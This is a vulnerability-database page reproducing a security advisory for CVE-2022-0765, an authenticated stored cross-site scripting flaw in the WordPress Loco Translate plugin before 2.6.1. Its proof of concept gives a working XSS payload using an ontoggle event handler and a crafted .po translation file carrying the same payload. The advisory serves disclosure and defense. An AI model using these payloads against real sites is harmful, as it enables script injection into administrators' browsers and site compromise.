Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTaurus OmarPACKETSTORM:166625
HistoryApr 07, 2022 - 12:00 a.m.

WordPress Loco Translate Cross Site Scripting

2022-04-0700:00:00
Taurus Omar
packetstormsecurity.com
260
wordpress
loco translate
xss

EPSS

0.001

Percentile

24.8%

JSON
`Tittle:  
WordPress Plugin Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting  
  
References:  
CVE-2022-0765  
  
Author:  
Taurus Omar   
  
Description:  
The plugin does not properly remove inline events from elements in the source translation strings before outputting them in the editor in the plugin admin panel, allowing any user with access to the plugin (Translator and Administrator by default) to add arbitrary javascript payloads to the source strings leading to a stored cross-site scripting (XSS) vulnerability.  
  
Affects Plugins:  
loco-translate - Fixed in version 2.6.1  
  
Proof of Concept:  
## POC1: via (edit-template)   
  
1.) Got to Plugin Loco Translate  
2.) Enter Plugins Options  
3.) Enter Edit Template Any Plugin  
4.) Add New Message   
5.) Edit Message  
6.) Replace The Message With The Payload : ">'><details/open/ontoggle=alert('xss')>  
7.) Save  
8.) Replicated  
  
  
## POC2 via (example.po)  
  
1.) Got to Plugin Loco Translate  
2.) Enter Plugins Options Any Plugin  
3.) Upload PO options  
3.) Load example.po  
  
Example.po  
  
msgid ""  
msgstr ""  
"Project-Id-Version: xss-tester\n"  
"Report-Msgid-Bugs-To: \n"  
"POT-Creation-Date: 2022-02-25 03:48+0000\n"  
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"  
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"  
"Language-Team: \n"  
"Language: \n"  
"Plural-Forms: nplurals=INTEGER; plural=EXPRESSION;\n"  
"MIME-Version: 1.0\n"  
"Content-Type: text/plain; charset=UTF-8\n"  
"Content-Transfer-Encoding: 8bit\n"  
"X-Generator: Loco https://localise.biz/\n"  
"X-Loco-Version: 2.5.8; wp-5.9.1\n"  
"X-Domain: xss-tester"  
msgid "xss-tester"  
msgstr ""  
msgid "\">'><details/open/ontoggle=confirm('XSS')>"  
msgstr ""   
  
Classification:  
Type XSS   
OWASP top 10 A7: Cross-Site Scripting (XSS)  
CWE-79  
  
wpScan:  
https://wpscan.com/vulnerability/58838f51-323d-41e0-8c85-8e113dc2c587  
  
`

Related

wpvulndb 1
patchstack 1
nvd 1
cve 1
prion 1
zdt 1
wpexploit 1
cvelist 1
wpvulndb
wpvulndb
Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting
2022-03-22 00:00:00
patchstack
patchstack
WordPress Loco Translate plugin <= 2.6.0 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability
2022-03-22 00:00:00
nvd
nvd
CVE-2022-0765
2022-04-18 18:15:08
cve
cve
CVE-2022-0765
2022-04-18 18:15:08
prion
prion
Cross site scripting
2022-04-18 18:15:00
zdt
zdt
WordPress Loco Translate Plugin < 2.6.1 - Authenticated Stored Cross-Site Scripting Vulnerability
2022-04-07 00:00:00
wpexploit
wpexploit
Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting
2022-03-22 00:00:00
cvelist
cvelist
CVE-2022-0765 Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting
2022-04-18 17:10:35

EPSS

0.001

Percentile

24.8%

JSON
Related for PACKETSTORM:166625
wpvulndb1patchstack1nvd1cve1prion1zdt1wpexploit1cvelist1